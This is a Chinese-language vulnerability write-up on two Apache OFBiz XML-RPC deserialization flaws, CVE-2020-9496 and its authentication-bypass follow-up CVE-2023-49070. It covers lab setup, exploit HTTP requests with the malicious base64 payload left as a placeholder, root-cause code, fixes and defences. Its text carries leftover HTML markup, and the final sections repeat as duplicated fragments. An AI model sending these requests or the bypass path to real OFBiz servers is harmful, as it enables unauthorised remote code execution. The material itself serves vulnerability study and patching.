Apache OFBiz XML-RPC漏洞分析（CVE-2023-49070 & CVE-2020-9496）<\/h1>

1. CVE-2020-9496漏洞分析<\/h2>

1.1 漏洞概述<\/h3>
Apache OFBiz未授权远程代码执行漏洞，影响版本：Apache OFBiz < 17.12.04<\/p>

1.2 环境搭建<\/h3>

下载受影响版本(17.12.03)：https:\/\/downloads.apache.org\/ofbiz\/<\/li>
配置并编译项目<\/li>
运行org.apache.ofbiz.base.start.Start启动服务<\/li>

访问https:\/\/localhost:8443\/accounting<\/li> <\/ol>

1.3 漏洞复现<\/h3>

发送以下恶意XML请求：<\/p>

POST<\/span> \/webtools\/control\/xmlrpc HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8443<\/span>
<\/span><\/span>Content-Type:<\/span> application\/xml<\/span>
<\/span><\/span>Content-Length:<\/span> 181<\/span>
<\/span><\/span>
<\/span><\/span><?xml version="1.0"?><\/span>
<\/span><\/span><methodCall><\/span>
<\/span><\/span><methodName><\/span>ProjectDiscovery<\/methodName><\/span>
<\/span><\/span><params><\/span>
<\/span><\/span>    <param><\/span>
<\/span><\/span>    <value><\/span>
<\/span><\/span>        <struct><\/span>
<\/span><\/span>        <member><\/span>
<\/span><\/span>            <name><\/span>test<\/name><\/span>
<\/span><\/span>            <value><\/span>
<\/span><\/span>            <serializable<\/span> xmlns=<\/span>"http:\/\/ws.apache.org\/xmlrpc\/namespaces\/extensions"<\/span>><\/span>
<\/span><\/span>            [base64编码的恶意payload]
<\/span><\/span>            <\/serializable><\/span>
<\/span><\/span>            <\/value><\/span>
<\/span><\/span>        <\/member><\/span>
<\/span><\/span>        <\/struct><\/span>
<\/span><\/span>    <\/value><\/span>
<\/span><\/span>    <\/param><\/span>
<\/span><\/span><\/params><\/span>
<\/span><\/span><\/methodCall><\/span>
<\/span><\/span><\/code><\/pre>注意<\/strong>：直接使用原始base64编码，不要进行URL编码<\/p>
1.4 XML-RPC消息格式分析<\/h3>
标准XML-RPC请求包含：<\/p>
<?xml version="1.0" encoding="utf-8"?><\/span>
<\/span><\/span><methodCall><\/span> 
<\/span><\/span>  <methodName><\/span>examples.getStateName<\/methodName><\/span>  
<\/span><\/span>  <params><\/span> 
<\/span><\/span>    <param><\/span> 
<\/span><\/span>      <value><\/span>
<\/span><\/span>        <i4><\/span>41<\/i4><\/span>
<\/span><\/span>      <\/value><\/span> 
<\/span><\/span>    <\/param><\/span> 
<\/span><\/span>  <\/params><\/span> 
<\/span><\/span><\/methodCall><\/span>
<\/span><\/span><\/code><\/pre>常见数据类型：<\/p>

array: <value><array><data><value><int>7<\/int><\/value><\/data><\/array><\/value><\/code><\/li>
struct:<\/li>
<\/ul>
<struct><\/span> 
<\/span><\/span>  <member><\/span> 
<\/span><\/span>    <name><\/span>foo<\/name><\/span> 
<\/span><\/span>    <value><\/span>bar<\/value><\/span> 
<\/span><\/span>  <\/member><\/span> 
<\/span><\/span><\/struct><\/span>
<\/span><\/span><\/code><\/pre>1.5 漏洞原理分析<\/h3>


路由处理<\/strong>：<\/p>

配置在webtools\/webapp\/webtools\/WEB-INF\/web.xml<\/code><\/li>
通过RequestHandler<\/code>处理请求，读取controller.xml<\/code>配置<\/li>
最终调用runEvent<\/code>函数处理请求<\/li>
<\/ul>
<\/li>

XML解析过程<\/strong>：<\/p>

使用XMLReader<\/code>解析POST数据，XmlRpcRequestParser<\/code>作为解析器<\/li>
当遇到serializable<\/code>标签且xmlns="http:\/\/ws.apache.org\/xmlrpc\/namespaces\/extensions"<\/code>时，返回SerializableParser<\/code>对象<\/li>
SerializableParser<\/code>创建base64解码器并解码数据<\/li>
在MapParser<\/code>的endValueTag<\/code>中调用getResult<\/code>触发反序列化<\/li>
<\/ul>
<\/li>

为什么使用struct标签<\/strong>：<\/p>

struct能将数据作为结构体传入<\/li>
只有使用struct才能在MapParser<\/code>中调用getResult<\/code>触发反序列化<\/li>
<\/ul>
<\/li>
<\/ol>
1.6 漏洞修复<\/h3>

在controller.xml<\/code>中为\/webtools\/control\/xmlrpc<\/code>路由添加鉴权<\/li>
在CacheFilter<\/code>中增加对serializable<\/code>标签的检查<\/li>
<\/ol>
2. CVE-2023-49070漏洞分析<\/h2>
2.1 漏洞概述<\/h3>
CVE-2020-9496的绕过漏洞，影响版本：Apache OFBiz < 18.12.10<\/p>
2.2 漏洞复现<\/h3>
POST<\/span> \/webtools\/control\/xmlrpc\/;\/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8443<\/span>
<\/span><\/span>Content-Type:<\/span> application\/xml<\/span>
<\/span><\/span>Content-Length:<\/span> 181<\/span>
<\/span><\/span>
<\/span><\/span><?xml version="1.0"?><\/span>
<\/span><\/span><methodCall><\/span>
<\/span><\/span><methodName><\/span>ProjectDiscovery<\/methodName><\/span>
<\/span><\/span><params><\/span>
<\/span><\/span>    <param><\/span>
<\/span><\/span>    <value><\/span>
<\/span><\/span>        <struct><\/span>
<\/span><\/span>        <member><\/span>
<\/span><\/span>            <name><\/span>test<\/name><\/span>
<\/span><\/span>            <value><\/span>
<\/span><\/span>            <serializable<\/span> xmlns=<\/span>"http:\/\/ws.apache.org\/xmlrpc\/namespaces\/extensions"<\/span>><\/span>
<\/span><\/span>            [base64编码的恶意payload]
<\/span><\/span>            <\/serializable><\/span>
<\/span><\/span>            <\/value><\/span>
<\/span><\/span>        <\/member><\/span>
<\/span><\/span>        <\/struct><\/span>
<\/span><\/span>    <\/value><\/span>
<\/span><\/span>    <\/param><\/span>
<\/span><\/span><\/params><\/span>
<\/span><\/span><\/methodCall><\/span>
<\/span><\/span><\/code><\/pre>2.3 漏洞原理分析<\/h3>


权限绕过机制<\/strong>：<\/p>

在LoginWorker<\/code>的checkLogin<\/code>方法中，有三个条件：
if<\/span> (<\/span>username ==<\/span> null<\/span>
<\/span><\/span>    ||<\/span> (<\/span>password ==<\/span> null<\/span> &&<\/span> token ==<\/span> null<\/span>)<\/span>
<\/span><\/span>    ||<\/span> "error"<\/span>.<\/span>equals<\/span>(<\/span>login(<\/span>request,<\/span> response)))<\/span>
<\/span><\/span><\/code><\/pre><\/li>
当requirePasswordChange=Y<\/code>时，login<\/code>方法返回requirePasswordChange<\/code>而非"error"<\/li>
从而绕过鉴权检查<\/li>
<\/ul>
<\/li>

CacheFilter绕过<\/strong>：<\/p>

通过添加\/;\/<\/code>绕过CacheFilter<\/code>对<\/serializable<\/code>的检查<\/li>
<\/ul>
<\/li>
<\/ol>
3. 总结与防护建议<\/h2>
3.1 漏洞链分析<\/h3>

CVE-2020-9496：未授权XML-RPC反序列化漏洞<\/li>
CVE-2023-49070：通过特殊参数和路径绕过鉴权机制<\/li>
<\/ol>
3.2 防护措施<\/h3>

升级到最新版本（≥18.12.10）<\/li>
禁用不必要的XML-RPC接口<\/li>
加强输入验证，特别是对XML数据的解析<\/li>
实施严格的权限控制<\/li>
<\/ol>
3.3 参考链接<\/h3>

https:\/\/mp.weixin.qq.com\/s\/vGgZxoKSMoiw98z63UuOpw<\/li>
https:\/\/xz.aliyun.com\/t\/8184\/<\/li>
https:\/\/xz.aliyun.com\/t\/8324<\/li>
https:\/\/www.oscs1024.com\/hd\/MPS-ope5-i4zj<\/li>
<\/ol>

Apache OFBiz XML-RPC漏洞分析（CVE-2023-49070 & CVE-2020-9496）<\/h1>

1. CVE-2020-9496漏洞分析<\/h2>

1.1 漏洞概述<\/h3> Apache OFBiz未授权远程代码执行漏洞，影响版本：Apache OFBiz < 17.12.04<\/p>

2. CVE-2023-49070漏洞分析<\/h2>

2.1 漏洞概述<\/h3> CVE-2020-9496的绕过漏洞，影响版本：Apache OFBiz < 18.12.10<\/p>

3. 总结与防护建议<\/h2>

3.3 参考链接<\/h3> https:\/\/mp.weixin.qq.com\/s\/vGgZxoKSMoiw98z63UuOpw<\/li> https:\/\/xz.aliyun.com\/t\/8184\/<\/li> https:\/\/xz.aliyun.com\/t\/8324<\/li> https:\/\/www.oscs1024.com\/hd\/MPS-ope5-i4zj<\/li> <\/ol>

1.1 漏洞概述<\/h3>
Apache OFBiz未授权远程代码执行漏洞，影响版本：Apache OFBiz < 17.12.04<\/p>

2.1 漏洞概述<\/h3>
CVE-2020-9496的绕过漏洞，影响版本：Apache OFBiz < 18.12.10<\/p>

3.3 参考链接<\/h3>

https:\/\/mp.weixin.qq.com\/s\/vGgZxoKSMoiw98z63UuOpw<\/li>
https:\/\/xz.aliyun.com\/t\/8184\/<\/li>
https:\/\/xz.aliyun.com\/t\/8324<\/li>
https:\/\/www.oscs1024.com\/hd\/MPS-ope5-i4zj<\/li> <\/ol>